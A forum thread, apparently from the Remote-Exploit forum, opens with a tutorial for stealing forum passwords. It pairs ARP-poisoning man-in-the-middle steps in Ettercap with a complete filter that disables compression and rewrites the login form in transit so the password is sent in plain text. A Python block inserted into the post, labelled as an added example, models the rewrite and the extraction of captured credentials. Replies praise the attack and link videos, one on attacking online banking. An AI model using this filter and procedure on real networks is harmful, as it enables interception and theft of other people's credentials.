
Thread: mini HowTo: sniffing for username and password, RemoteExploit Forum

  1. #1
    Just burned his ISO
    Join Date
    May 2006
    Posts
    2

    Default mini HowTo: sniffing for username and password, RemoteExploit Forum

    sorry for my totally POOR English :-(

    I wrote this mini tutorial because I wanted to play with Ettercap filters.

    If you have ever sniffed the username and password sent to the RE Forum, you will have noticed that the username is sent in clear text but the password is sent as an MD5 hash. The MD5 hash is computed by JavaScript. If we look at the source code of the main forum page "http://forums.remote-exploit.org/index.php" we can see that the MD5 JavaScript is located at "http://forums.remote-exploit.org/clientscript/vbulletin_md5.js".

    Let's look at the first line of the login section of index.php. 'onsubmit' means that when we press the LOG IN button the 'md5hash' JavaScript function is executed. The value entered in the password field 'vb_login_password' is passed to the JavaScript, the MD5 hash is computed and sent back to the FORM as 'vb_login_md5password' and 'vb_login_md5password_utf'.

    How to "hack" this login method? Of course we can sniff the username and the MD5 hash and then break the MD5 with a rainbow table. But I think there are a lot of better ways to get the password. I like Ettercap and its packet filters. That's why I 'hacked' the forum using my own Ettercap filter.

    OK, the main idea is that the password must be forced to be sent to the web server in plain text. Obviously the user shouldn't notice that his/her network is being sniffed, so the login script must be modified in such a way that normal logging into the forum still works. The simplest way to do this is to modify the login section of index.php. As we see below, there are input tags of type='hidden'. These fields are filled in by the md5hash JavaScript and then sent to the server. I think the best solution is just to add a new input field and copy the password string into it. To do this, the existing HTML code must be modified. Let's use ETTERCAP and its filters.

    But first we should look at the HTTP traffic generated by the RE Forum during login. Start ETHEREAL. As we see, the HTML source code isn't sent in plain text! It is compressed with gzip (deflate). To disable this feature we have to remove the entry "Accept-Encoding: gzip,deflate" from the HTTP request and replace it with something else (I've seen the Ettercap and Yahoo tutorial, that's how I know this ;-). Let's use one of the Ettercap filters to eliminate gzip compression. Now we can sniff the network and we notice that the forum page is sent without gzip compression! Pure HTML code! So let's modify something. I suggest replacing a useless part of line 14 with something useful, like a new input tag ;-)
    I added ONFOCUS to the login button section because I wanted to assign "vb_login_password.value" to x.value of the new input tag, so that x is sent to the server in plain text.

    onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" />

    Now we have a new, useless parameter 'x' which is sent in plain text to the server, to 'login.php'. The server ignores it, but we don't, because this is our desired password!

    To start sniffing, the Ettercap filter must be compiled.
    1. Create a new empty file ForumFilter.filter
    2. Copy and paste the included Ettercap filter into the file
    3. Compile it: 'etterfilter ForumFilter.filter -o ForumFilter'

    Next, start Ettercap
    1. Sniff -> Unified Sniffing
    2. Hosts -> Scan for Hosts
    3. Hosts -> Host List, and add the victim's machine to target 1 and the router etc. to target 2
    4. MITM -> ARP Poisoning, Sniff Remote Connections
    5. Filters -> Load a filter, then open our ForumFilter
    6. Start -> Start sniffing

    Next, start ETHEREAL.
    The network is now being sniffed.
    If everything is done correctly, the username and password should appear in plain text in the sniffer.

    This is the screenshot from ETHEREAL:
    Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://forums.remote-exploit.org/index.php
    Cookie: bbsessionhash=5613a271e92e68758bede781f8795775; bblastvisit=1157060031; bblastactivity=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 183

    vb_login_username=eXterminator&vb_login_password=&x=#######&s=&do=login&vb_login_md5password=10219952f5b55f334be8e24b6ce0ed6f&vb_login_md5password_utf=10216952f5b87d8b88e24b6ab0ed6f
    HTTP/1.0 200 OK

    Line 14 after modification:
    <td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or c" onfocus="x.value =vb_login_password.value" /><input type="hidden" name="x" /></td>


    This is the login form from index.php (line numbers are referred to above):
    <!-- login form -->
    1 <form action="login.php" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
    2 <script type="text/javascript" src="clientscript/vbulletin_md5.js"></script>
    3 <table cellpadding="0" cellspacing="3" border="0">
    4
    5 <tr>
    6 <td class="smallfont">User Name</td>
    7 <td><input type="text" class="bginput" style="font-size: 11px" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" onfocus="if (this.value == 'User Name') this.value = '';" /></td>
    8 <td class="smallfont" colspan="2" nowrap="nowrap"><label for="cb_cookieuser_navbar"><input type="checkbox" name="cookieuser" value="1" tabindex="103" id="cb_cookieuser_navbar" accesskey="c" />Remember Me?</label></td>
    9 </tr>
    10 <tr>
    11 <td class="smallfont">Password</td>
    12
    13 <td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" size="10" accesskey="p" tabindex="102" /></td>
    14 <td><input type="submit" class="button" value="Log in" tabindex="104" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile for yourself." accesskey="s" /></td>
    15 </tr>
    16 </table>
    17 <input type="hidden" name="s" value="" />
    18 <input type="hidden" name="do" value="login" />
    19 <input type="hidden" name="vb_login_md5password" />
    20 <input type="hidden" name="vb_login_md5password_utf" />
    21 </form>

    <!-- / login form -->

    MY ETTERCAP FILTER

    # Part 1: neutralise the client's Accept-Encoding header so the server
    # answers with uncompressed HTML that the last rule can search and rewrite.
    # Every replacement has the same length as the text it overwrites.
    if (search(DATA.data, "gzip")) {
        replace("gzip", "    "); # four spaces, same length as "gzip"
        msg("whited out gzip\n");
    }
    if (search(DATA.data, "deflate")) {
        replace("deflate", "       "); # seven spaces, same length as "deflate"
        msg("whited out deflate\n");
    }
    if (search(DATA.data, "gzip,deflate")) {
        replace("gzip,deflate", "            "); # twelve spaces, same length as "gzip,deflate"
        msg("whited out deflate and gzip\n");
    }
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!"); # same length as the original header name
        msg("zapped Accept-Encoding!\n");
    }
    if (search(DECODED.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!"); # same length as the original header name
        msg("zapped AcceptDECODED-Encoding!\n");
    }
    # Part 2: rewrite line 14 of the login form. The tail of the title attribute
    # and the accesskey are replaced by an onfocus handler that copies the
    # password into a new hidden field 'x', which is then POSTed in plain text.
    if (search(DATA.data, "click the 'register'")) {
        replace("lick the 'register' button to create a profile for yourself.\x22 accesskey=\x22s\x22 />", "\x22 onfocus=\x22x.value =vb_login_password.value\x22 /><input type=\x22hidden\x22 name=\x22x\x22 />");
        msg("REPLACED\n");
    }

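The three stages of the post above (request header neutralised, login button rewritten, plaintext recovered from the POST) modelled offline in Python, as an added example; this is not the post's code and not an Ettercap filter, it only reproduces the filter's search/replace strings so the rewrite can be checked on constructed samples without a network. The request, the POST body and the function names are constructed for this example; the claim that vbulletin_md5.js sends MD5(password) in vb_login_md5password is taken from the post, and the check assumes a plain-ASCII password, for which the ordinary and the _utf hash are the same.

```python
"""Offline model of the Ettercap rewrite described in the post (added example).

Stage 1 neutralises Accept-Encoding in the request so the reply is plain HTML,
stage 2 rewrites line 14 of the login form so focusing the button copies the
password into a hidden field 'x', stage 3 parses the resulting login POST and
checks the captured plaintext against the MD5 the client sends next to it.
"""
import hashlib
from urllib.parse import parse_qs, urlencode

# --- Constructed samples (not captured traffic) ----------------------------
SAMPLE_REQUEST = (
    b"GET /index.php HTTP/1.1\r\n"
    b"Host: forums.remote-exploit.org\r\n"
    b"Accept-Encoding: gzip,deflate\r\n"
    b"\r\n"
)
# Line 14 of the login form as quoted in the post.
LOGIN_BUTTON = (
    b'<td><input type="submit" class="button" value="Log in" tabindex="104" '
    b'title="Enter your username and password in the boxes provided to login, or '
    b'click the \'register\' button to create a profile for yourself." accesskey="s" /></td>'
)
# Search and replacement strings from the last rule of the post's filter.
ORIGINAL_TAIL = b'lick the \'register\' button to create a profile for yourself." accesskey="s" />'
INJECTED_TAIL = (
    b'" onfocus="x.value =vb_login_password.value" />'
    b'<input type="hidden" name="x" />'
)


def neutralise_accept_encoding(request: bytes) -> bytes:
    """Stage 1: mirror of the filter's first rules. Each replacement has the same
    length as the text it overwrites, so the request size does not change."""
    out = request
    for token in (b"gzip", b"deflate", b"gzip,deflate"):  # same order as the filter
        out = out.replace(token, b" " * len(token))
    return out.replace(b"Accept-Encoding", b"Accept-Rubbish!")


def inject_plaintext_field(html: bytes) -> bytes:
    """Stage 2: mirror of the filter's last rule. The title attribute is cut short,
    the accesskey is dropped, and an onfocus handler plus hidden input 'x' are added."""
    if b"click the 'register'" not in html:
        return html
    return html.replace(ORIGINAL_TAIL, INJECTED_TAIL, 1)


def extract_credentials(post_body: bytes) -> dict:
    """Stage 3: pull username, the plaintext in 'x' and both MD5 fields from the POST."""
    fields = parse_qs(post_body.decode("latin-1"), keep_blank_values=True)

    def first(name):
        return fields.get(name, [""])[0]

    return {
        "username": first("vb_login_username"),
        "password": first("x"),
        "md5": first("vb_login_md5password"),
        "md5_utf": first("vb_login_md5password_utf"),
    }


def password_matches_hash(password: str, md5_hex: str) -> bool:
    """Check the captured plaintext against the hash the client sent with it.
    Assumption (from the post): vbulletin_md5.js puts MD5(password) into
    vb_login_md5password; for an ASCII password that is MD5 of the ASCII bytes."""
    return hashlib.md5(password.encode("latin-1")).hexdigest() == md5_hex.lower()


def build_sample_post(username: str, password: str) -> bytes:
    """Constructed login POST in the shape of the capture in the post: the real
    password field arrives blank and the copy made by the onfocus handler is in 'x'."""
    digest = hashlib.md5(password.encode("latin-1")).hexdigest()
    return urlencode([
        ("vb_login_username", username),
        ("vb_login_password", ""),
        ("x", password),
        ("s", ""),
        ("do", "login"),
        ("vb_login_md5password", digest),
        ("vb_login_md5password_utf", digest),
    ]).encode("ascii")


if __name__ == "__main__":
    print(neutralise_accept_encoding(SAMPLE_REQUEST).decode())
    print(inject_plaintext_field(LOGIN_BUTTON).decode())
    creds = extract_credentials(build_sample_post("eXterminator", "s3cret"))
    print(creds, password_matches_hash(creds["password"], creds["md5"]))
```

The hash check is the caveat worth keeping: the injected handler only runs when the Log in button actually receives focus, so a user who submits with Enter from the password field sends an empty 'x', and comparing 'x' against vb_login_md5password tells a captured password apart from a missed one instead of trusting whatever arrived.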
  2. #2
    xatar
    Guest

    Default

    Good analysis of the code structure and the system. I also really like the use of Ettercap filters to alter source code in transit.

    Have you thought of making a video of this as that works a lot better for tutorials?

  3. #3
    Just burned his ISO
    Join Date
    Aug 2006
    Posts
    18

    Default

    Have you thought of making a video of this as that works a lot better for tutorials?
    It will be much better than only text.

  4. #4
    Just burned his ISO
    Join Date
    May 2006
    Posts
    2

    Talking

    I made the simple video tutorial you requested.
    It shows how the login and the password for the Remote-exploit Forum can be easily sniffed.

    This is my second video tutorial, so forgive me some editing mistakes.
    http://www.raszewski.info/ettercap_REforum.avi


    This is my first tutorial: MITM attack + online banking. Unfortunately this is the Polish version of the tutorial.
    http://ta2man.info/mitmByRashid.avi

    enjoy

  5. #5

    Default Nice Vids

    Thanks for sharing them, I enjoyed them both.
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  6. #6
    Just burned his ISO
    Join Date
    Sep 2006
    Posts
    3

    Default

    hehehehehe

    Real nice

  7. #7
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    2

    Default

    For those who get an error when trying to play the file...
    you will need to have the TechSmith Video Codec,

    which you can download here ---> http://download.techsmith.com/tscc/tscc.exe


    U.

  8. #8
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    2

    Default

    Oops, I forgot!

    As Christmas is getting nearer... you could add a nice "koledy" (carols) soundtrack to the first video, so we can get into the mood of your motherland.

    U.

  9. #9
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    1

    Default

    Can this technique be used to sniff a virtual URL to get the actual URL?

    Example:
    virtual url: domain.com/member/member.php
    actual url: domain.com/member/vip/member.php?id=1
